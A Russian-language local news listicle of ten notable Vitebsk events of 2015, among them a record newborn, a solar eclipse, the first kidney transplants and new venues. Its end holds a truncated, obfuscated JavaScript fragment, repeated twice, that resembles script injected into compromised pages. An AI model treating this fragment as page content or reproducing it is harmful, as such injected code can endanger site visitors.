10 знаковых событий Витебска за 2015 год

Оглянемся же в след уходящему году и вспомним наиболее интересные события, которые радовали, печалили или удивляли жителей нашего города. 

1. В Витебске родился богатырь!

s001119_644791

Фото belta.by

В январе 2015 года, ровно год назад, в Витебском областном клиническом родильном доме появился на свет мальчик весом 6 кг 190 г и ростом 59 см – самый крупный новорожденный малыш в Беларуси.  Андрей Сахаров, так назвали настоящего богатыря, выглядит по словам врачей как 3-месячный ребенок. Желаем малышу здоровья, роста и пусть его известное имя принесет ему удачу и успех в будущем.

2. Открылся выставочный зал «Арт-пространство на Толстого,7»

dscn9413

Фото Евгения Москвина

У творческой интеллигенции Витебска в январе 2015 появился новый повод для радости: в Витебске открылся новый выставочный зал. Здание, является памятником архитектуры XIX века. Раньше на этой улице был центр культурной и общественной жизни. Поэтому символично, что «Арт−пространство» открыло эпоху витебского современного искусства в таком значимом для города месте.

3Полеты на курорты из Витебского аэропорта

aeroport-vitebsk-vostochnyj-02-1

Фото tuda-suda.by

Этим летом жителям Витебска, чтобы попасть на курорты Болгарии и Турции, не нужно было ехать в аэропорты Минска или Москвы. Первый рейс из областного центра отправился 30 мая в болгарский город Бургас — один из самых популярных черноморских курортов. Осуществляла перевозку авиакомпания «Белавиа». Как оказалось, по завершении курортного сезона перелеты из Витебска оказались весьма востребованы не только витеблянами, но также жителями других городов области и даже ближайших к нам городов России.

4. Мы увидели уникальное солнечное затмение.

MG_9216

Фото Виктория Тарасевич

20 марта 2015 году жители Витебска смогли наблюдать крупнейшее за 16 лет полное солнечное затмение. Светило почти полностью скрылось за тенью Луны. Смотреть на солнце невооруженным взглядом было невозможно, поэтому в ход шли старые дискеты, засвеченная пленка из фотоаппаратов, стекла темных бутылок и даже сварочные маски. Максимум затмения пришелся на 13 часов 11 минут — в финальной фазе затмения Солнце превратилось в красивую «лодочку».В это время на улице наступил легкий сумрак и даже стало ощутимо прохладнее.

5. Проект строительства Софийского собора был представлен общественности
saint_sophia_vitebsk_03-600x350

Фото tut.by

В день празднования Успения Божьей Матери возле Свято-Успенского кафедрального собора в Витебске состоялась презентация концепции будущего храма.  Строительство Софийского собора будет вестись за счет средств общины, пожертвований прихожан, спонсоров и всех неравнодушных. Новость о строительстве собора вызвала неоднозначные отклики у общественности, люди выражали разные мнения, от радости до крайнего удивления от идеи появления нового культового объекта.
6. В Витебске состоялась первая операция по пересадке почки
american-surgeons-have-performed-a-complex-transplant-donor-organs

Фото positime.ru

В сентябре 2015 года на базе областной клинической больницы в отделении клинической гепатологии и трансплантации специалистами Республиканского научно-практического центра трансплантации органов и тканей, совместно с витебскими специалистами, было проведено две операции по пересадки почки. Была прооперирована 30-летняя женщина, которая ждала донорскую почку более 6 лет, также новый орган получил мужчина 1974 года рождения, который стоял в листе ожидания 2 года. Витебск стал четвертым регионом, где начали проводить такую операцию.

7. Закрылся клуб «Энергия»

dscn9509

Фото Евгения Москвина

Клуб «Энергия» был открыт в Витебске 28 июня 2008 года. Он считался самым большим ночным развлекательным центром — его площадь 5800 квадратных метров, а длина барной стойки — 44 метра. Вместительность — 4 тысячи человек. Площадь танцпола — 3 тысячи квадратных метров, мощность звука — 30 000 Вт. Последняя масштабная вечеринка в «Энергии» состоялась в конце июня, а уже с 1 июля прекращает культурно-развлекательный центр начали переоборудовать в гигантский строительный рынок. Недавно в клубной сфере Витебска появился новый игрок —Культурно-Развлекательный Центр «Vintage», который амбициозно позиционирует себя как современный клуб европейского уровня. Станет ли он заменой легендарной «Энергии» покажет время. Одно можно сказать точно, таким же демократичным по цене он не будет.

8. В городе открылся визовый центр

show-pony-360x210

Фото latvia.pony-visa.by

Витебск стал вторым городом после Минска, где появился визовый центр фирмы PONY EXPRESS. Компания оказывает услуги по выдаче виз гражданам Беларуси в такие страны Шенгенского соглашения, как Латвия, Испания, Эстония, Франция, Нидерланды. А это значит, что витебчанам и жителям области станет проще и доступнее получение «шенгена». В визовом центре можно подать документы на визу без предварительной записи, а в порядке живой очереди.

9. Появилось кафе известной сетевой компании «Baskin Robbins» 

DSCN0318

Фото Евгения Москвина

Первое в Беларуси заведение международной сети кафе-мороженого «Baskin Robbins» открылось в Витебске. Франшизу кафе выкупила витебская компания «Арена-пицца». В планах франчайзи до конца 2016 года запустить в областном центре еще два кафе под известной торговой маркой из расчета одно заведение на 100 тыс. жителей. Франшиза выкуплена на 10 лет.

10. Открылся значимый спортивный объект

centr_edinoborstv_vitebsk_2

Фото Игорь Матвеев

Когда-то здание на Журжевской, 7 хотели переделать под кинотеатр, но этого не случилось. В 2008 году здание передали Витебской областной школе высшего спортивного мастерства. Вскоре здесь началась реконструкция. В нее было вложено около 25 млрд рублей.Сейчас в центре олимпийского резерва по единоборствам спортсмены занимаются таэквондо, боксом, кикбоксингом, дзюдо, гимнастикой, вольной, греко-римской и другими видами борьбы.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “vkurier.by”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “vkurier.by”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e